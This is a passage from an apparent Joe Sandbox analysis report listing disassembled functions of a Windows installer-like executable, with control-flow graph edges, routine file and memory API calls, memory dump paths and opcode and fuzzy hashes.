                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: nsa
                                                                                        • API String ID: 1716503409-2209301699
                                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                        Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 758 4078c5-4078cb 759 4078d0-4078eb 758->759 760 4078cd-4078cf 758->760 761 407aeb-407aff 759->761 762 407bad-407bba 759->762 760->759 764 407b01-407b17 761->764 765 407b19-407b2c 761->765 763 407be7-407beb 762->763 766 407c4a-407c5d 763->766 767 407bed-407c0c 763->767 768 407b33-407b3a 764->768 765->768 771 407c65-407c68 766->771 772 407c25-407c39 767->772 773 407c0e-407c23 767->773 769 407b61-407b64 768->769 770 407b3c-407b40 768->770 769->771 774 407b46-407b5e 770->774 775 407ccd-407cd4 770->775 779 407350 771->779 780 407cec 771->780 776 407c3c-407c43 772->776 773->776 774->769 778 407cdd-407cea 775->778 781 407be1-407be4 776->781 782 407c45 776->782 783 407cef-407cf6 778->783 784 407357-40735b 779->784 785 40749b-4074b6 779->785 786 40746d-407471 779->786 787 4073ff-407403 779->787 780->783 781->763 789 407cd6 782->789 790 407bc6-407bde 782->790 784->778 792 407361-40736e 784->792 785->761 793 407c76-407c7d 786->793 794 407477-40748b 786->794 795 407409-407420 787->795 796 407c6d-407c74 787->796 789->778 790->781 792->780 797 407374-4073ba 792->797 793->778 798 40748e-407496 794->798 799 407423-407427 795->799 796->778 801 4073e2-4073e4 797->801 802 4073bc-4073c0 797->802 798->786 803 407498 798->803 799->787 800 407429-40742f 799->800 804 407431-407438 800->804 805 407459-40746b 800->805 808 4073f5-4073fd 801->808 809 4073e6-4073f3 801->809 806 4073c2-4073c5 GlobalFree 802->806 807 4073cb-4073d9 GlobalAlloc 802->807 803->785 810 407443-407453 GlobalAlloc 804->810 811 40743a-40743d GlobalFree 804->811 805->798 806->807 807->780 812 4073df 807->812 808->799 809->808 809->809 810->780 810->805 811->810 812->801
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                        Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 813 407ac3-407ac7 814 407ac9-407bba 813->814 815 407ade-407ae4 813->815 825 407be7-407beb 814->825 817 407aeb-407aff 815->817 818 407b01-407b17 817->818 819 407b19-407b2c 817->819 822 407b33-407b3a 818->822 819->822 823 407b61-407b64 822->823 824 407b3c-407b40 822->824 828 407c65-407c68 823->828 826 407b46-407b5e 824->826 827 407ccd-407cd4 824->827 829 407c4a-407c5d 825->829 830 407bed-407c0c 825->830 826->823 831 407cdd-407cea 827->831 837 407350 828->837 838 407cec 828->838 829->828 833 407c25-407c39 830->833 834 407c0e-407c23 830->834 836 407cef-407cf6 831->836 835 407c3c-407c43 833->835 834->835 844 407be1-407be4 835->844 845 407c45 835->845 839 407357-40735b 837->839 840 40749b-4074b6 837->840 841 40746d-407471 837->841 842 4073ff-407403 837->842 838->836 839->831 846 407361-40736e 839->846 840->817 847 407c76-407c7d 841->847 848 407477-40748b 841->848 850 407409-407420 842->850 851 407c6d-407c74 842->851 844->825 852 407cd6 845->852 853 407bc6-407bde 845->853 846->838 854 407374-4073ba 846->854 847->831 855 40748e-407496 848->855 856 407423-407427 850->856 851->831 852->831 853->844 858 4073e2-4073e4 854->858 859 4073bc-4073c0 854->859 855->841 860 407498 855->860 856->842 857 407429-40742f 856->857 861 407431-407438 857->861 862 407459-40746b 857->862 865 4073f5-4073fd 858->865 866 4073e6-4073f3 858->866 863 4073c2-4073c5 GlobalFree 859->863 864 4073cb-4073d9 GlobalAlloc 859->864 860->840 867 407443-407453 GlobalAlloc 861->867 868 40743a-40743d GlobalFree 861->868 862->855 863->864 864->838 869 4073df 864->869 865->856 866->865 866->866 867->838 867->862 868->867 869->858
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                        Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                        Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                        Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                        Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                        Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 3394109436-0
                                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                        Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                        Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                        Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                        • String ID:
                                                                                        • API String ID: 4115351271-0
                                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
